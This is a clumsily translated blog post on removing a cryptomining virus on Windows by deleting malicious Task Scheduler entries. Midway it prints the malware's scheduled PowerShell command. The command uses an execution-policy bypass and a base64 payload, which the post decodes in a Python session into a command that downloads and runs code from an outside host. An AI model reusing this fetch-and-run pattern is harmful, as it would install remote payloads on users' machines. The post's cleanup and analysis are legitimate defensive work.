Not long ago a mentor to me for help, said his computer with a virus mining, power is always automatically perform some malicious programs, resulting in CPU is occupied, the computer is running slow, while some of the C disk will appear from time to time malicious software. And because the system has its own problems to reset their system, before resetting forget the WinRAR compression software to back up inadvertently downloaded the spam software, every time you boot the computer always install some rogue software to the C drive.
Figure:
This is mining the virus is automatically installed and executed in the C drive program.
Solution:
To solve such problems have a common way is to open your Task Scheduler, very simple, direct search in the search bar. Figure:
Open to see:
You program the system are regularly performed here. The malicious software is here to implant their own "evil", cause the system to perform some malicious programs automatically, or automatically download software. Malicious viruses such as mining Scheduler:
While also relying on a similar 360 security browser to automatically download malware Task Scheduler is installed on my computer.
Direct disable, and delete in order to solve the above problems! ! But also will automatically download malicious programs, software and bring these together unloading consequences of rogue software delete! !
So, how are these malicious programs work?
I see the code it automatically runs in the mining virus program automatically executed as follows:
powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAY
wBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQA
cAA6AC8ALwBjAHMALgBzAHMAbABzAG4AZwB5AGwAOQAwAC4AYwBvAG0AJwApACkA
That is, automatically running code segment back in powershell, I used to decrypt base64, the following is decrypted code python:
C:\Users\pc>python
Python 3.6.4 (v3.6.4:d48eceb, Dec 19 2017, 06:54:40) [MSC v.1900 64 bit (AMD64)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> import base64
>>> url = "SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBjAHMALgBzAHMAbABzAG4AZwB5AGwAOQAwAC4AYwBvAG0AJwApACkA"
>>> str_url = base64.b64decode(url)
>>> print(str_url)
b"I\x00E\x00X\x00 \x00(\x00(\x00n\x00e\x00w\x00-\x00o\x00b\x00j\x00e\x00c\x00t\x00 \x00n\x00e\x00t\x00.\x00w\x00e\x00b\x00c\x00l\x00i\x00e\x00n\x00t\x00)\x00.\x00d\x00o\x00w\x00n\x00l\x00o\x00a\x00d\x00s\x00t\x00r\x00i\x00n\x00g\x00(\x00'\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00c\x00s\x00.\x00s\x00s\x00l\x00s\x00n\x00g\x00y\x00l\x009\x000\x00.\x00c\x00o\x00m\x00'\x00)\x00)\x00"
>>> str_url = base64.b64decode(url).decode("utf-8")
>>> str(str_url)
"I\x00E\x00X\x00 \x00(\x00(\x00n\x00e\x00w\x00-\x00o\x00b\x00j\x00e\x00c\x00t\x00 \x00n\x00e\x00t\x00.\x00w\x00e\x00b\x00c\x00l\x00i\x00e\x00n\x00t\x00)\x00.\x00d\x00o\x00w\x00n\x00l\x00o\x00a\x00d\x00s\x00t\x00r\x00i\x00n\x00g\x00(\x00'\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00c\x00s\x00.\x00s\x00s\x00l\x00s\x00n\x00g\x00y\x00l\x009\x000\x00.\x00c\x00o\x00m\x00'\x00)\x00)\x00"
>>> str_url.replace('\x00','')
"IEX ((new-object net.webclient).downloadstring('http://cs.sslsngyl90.com'))"
Which replace the garbled, you can get a URL: http: //cs.sslsngyl90.com
Open discovered the "mystery" of which
These are simple solutions such malware.